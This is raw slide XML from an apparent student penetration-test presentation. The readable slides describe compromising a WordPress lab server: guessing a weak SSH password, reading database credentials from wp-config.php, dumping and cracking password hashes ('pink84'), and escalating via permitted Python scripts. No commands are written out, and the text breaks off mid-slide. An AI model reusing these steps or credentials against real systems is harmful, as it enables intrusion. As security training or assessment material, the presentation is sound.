          <a:xfrm>
            <a:off x="731476" y="1706880"/>
            <a:ext cx="22915501" cy="27300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="Google Shape;1632;p12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33" name="Google Shape;1633;p122"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731329" y="13083880"/>
            <a:ext cx="22915501" cy="27300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A9B7C0"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1634" name="Google Shape;1634;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35" name="Google Shape;1635;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143481" y="10328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6" name="Google Shape;1636;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219475" y="10328151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1637" name="Google Shape;1637;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07</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1638" name="Google Shape;1638;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9" name="Google Shape;1639;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32258" y="10328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40" name="Google Shape;1640;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143181" y="11496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1" name="Google Shape;1641;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219175" y="11496427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1642" name="Google Shape;1642;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08</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1643" name="Google Shape;1643;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4" name="Google Shape;1644;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32192" y="11496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45" name="Google Shape;1645;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143348" y="7991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6" name="Google Shape;1646;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219342" y="7991151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1647" name="Google Shape;1647;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05</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1648" name="Google Shape;1648;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9" name="Google Shape;1649;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32391" y="7991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50" name="Google Shape;1650;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143048" y="9159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1" name="Google Shape;1651;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219042" y="9159427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1652" name="Google Shape;1652;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06</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1653" name="Google Shape;1653;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4" name="Google Shape;1654;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32392" y="9159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55" name="Google Shape;1655;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143415" y="5694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6" name="Google Shape;1656;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219408" y="5694151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1657" name="Google Shape;1657;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03</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1658" name="Google Shape;1658;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9" name="Google Shape;1659;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32324" y="5694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60" name="Google Shape;1660;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143115" y="6862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1" name="Google Shape;1661;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219108" y="6862427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1662" name="Google Shape;1662;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04</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1663" name="Google Shape;1663;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4" name="Google Shape;1664;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32658" y="6862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65" name="Google Shape;1665;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3143281" y="3357024"/>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6" name="Google Shape;1666;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219275" y="3357151"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1667" name="Google Shape;1667;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01</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1668" name="Google Shape;1668;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9" name="Google Shape;1669;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="3357333"/>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70" name="Google Shape;1670;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142981" y="4525300"/>
            <a:ext cx="20504399"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1" name="Google Shape;1671;p122"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1218975" y="4525427"/>
            <a:ext cx="1606396" cy="1005814"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1672" name="Google Shape;1672;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02</a:t>
              </a:r>
              <a:endParaRPr sz="5300" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1673" name="Google Shape;1673;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4" name="Google Shape;1674;p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32791" y="4525667"/>
            <a:ext cx="23679299"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theme" Target="../theme/theme3.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05"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;p26"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731377" y="5060867"/>
            <a:ext cx="22914900" cy="2112900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="6800"/>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19" name="Google Shape;2319;p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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2320" name="Google Shape;2320;p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r>
              <a:rPr lang="en-US"/>
              <a:t>Created by: Jason Settlecowski, Peter Nashaat, Ouassim Djida, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lane Schoof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10"/>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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2401" name="Google Shape;2401;p1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10</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2402" name="Google Shape;2402;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="109238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Guessing passwords at random granted a user shell for Michael through a weak password – “ michael “</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="62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And once Steven’s password hash was found, it was cracked within seconds – “ pink84 “</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2403" name="Google Shape;2403;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6004266" y="4010692"/>
            <a:ext cx="12368986" cy="3732828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2404" name="Google Shape;2404;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2918383" y="9618292"/>
            <a:ext cx="18540883" cy="2702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11"/>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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2410" name="Google Shape;2410;p1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11</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2411" name="Google Shape;2411;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="98667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First, we remotely accessed the server through SSH using Michael’s credentials:</a:t>
            </a:r>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977900" lvl="0" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The user had read/write privileges for the WordPress configuration file        (wp-config.php) and was able to see the WordPress database username and password:</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2412" name="Google Shape;2412;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127827" y="3198898"/>
            <a:ext cx="12121863" cy="3659102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2413" name="Google Shape;2413;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39208"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6127827" y="8502998"/>
            <a:ext cx="13265524" cy="36591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sp>
        <p:nvSpPr>
          <p:cNvPr id="2418" name="Google Shape;2418;p12"/>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Improper Access Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2419" name="Google Shape;2419;p1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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2420" name="Google Shape;2420;p12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="98667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Now the unauthorized user was able to log in to the WordPress database using the MySQL module:</a:t>
            </a:r>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Traversing the database tables revealed the hashed passwords for the users:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2421" name="Google Shape;2421;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="8599" b="56716"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326843" y="3982535"/>
            <a:ext cx="13723831" cy="2875465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2422" name="Google Shape;2422;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="25492" b="26440"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4359423" y="7850606"/>
            <a:ext cx="15658673" cy="4094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13"/>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u="sng"/>
              <a:t>Exploitation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Improper Privilege Management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Google Shape;2428;p1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13</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2429" name="Google Shape;2429;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942801" cy="9866700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Armed with Steven’s credentials, we were again able to SSH into the server and check our permissions, revealing the ability to run Python scripts:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="977900" lvl="0" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
